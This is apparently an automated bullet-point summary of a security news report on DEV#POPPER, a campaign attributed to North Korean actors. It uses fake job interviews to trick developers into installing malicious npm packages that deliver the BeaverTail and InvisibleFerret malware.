April 27, 2024 at 02:00AM
A social engineering campaign named DEV#POPPER is targeting software developers with fraudulent job interviews, leading them to download and execute malicious npm packages, including a Python backdoor. The campaign is linked to North Korean threat actors. They disguise themselves as employers to distribute malware, indicating ongoing efforts to enhance their cyber attack capabilities.
Key takeaways from the meeting notes on Newsroom Malware/Software Security:
– An ongoing social engineering campaign, known as DEV#POPPER, is targeting software developers with bogus npm packages under the guise of a job interview, tricking them into downloading a Python backdoor. This campaign is being tracked by cybersecurity firm Securonix, linking it to North Korean threat actors.
– Security researchers have identified that developers are asked to download and run software from sources that appear legitimate, such as GitHub, during fraudulent interviews. The software contains a malicious Node JS payload that compromises the developer’s system once executed.
– The campaign, which was first revealed in late November 2023, involves activities like posing as employers to lure software developers into installing malware such as BeaverTail and InvisibleFerret through the interview process. Furthermore, malicious packages on the npm registry have been uncovered that deliver the same malware families to compromise developer systems.
– Contagious Interview, focusing on targeting developers, and Operation Dream Job (aka DeathNote or NukeSped), linked to the Lazarus Group from North Korea, are distinct offensive campaigns targeting professionals in different sectors with malware.
– The attack chain detailed by Securonix starts with a ZIP archive hosted on GitHub, containing a seemingly innocuous npm module that harbors a malicious JavaScript file (BeaverTail) and a Python backdoor (InvisibleFerret) retrieved from a remote server. The implant is capable of various malicious activities, including command execution, file enumeration and exfiltration, and clipboard and keystroke logging.
– North Korean threat actors continue to update their cyber attack arsenal, consistently improving their tradecraft to hide their actions, blend into host systems and networks, and siphon off data for financial gain.
– Maintaining a security-focused mindset, especially during intense and stressful situations like job interviews, is crucial to defend against social engineering attacks.
For further exclusive content, it is recommended to follow the sources on Twitter and LinkedIn.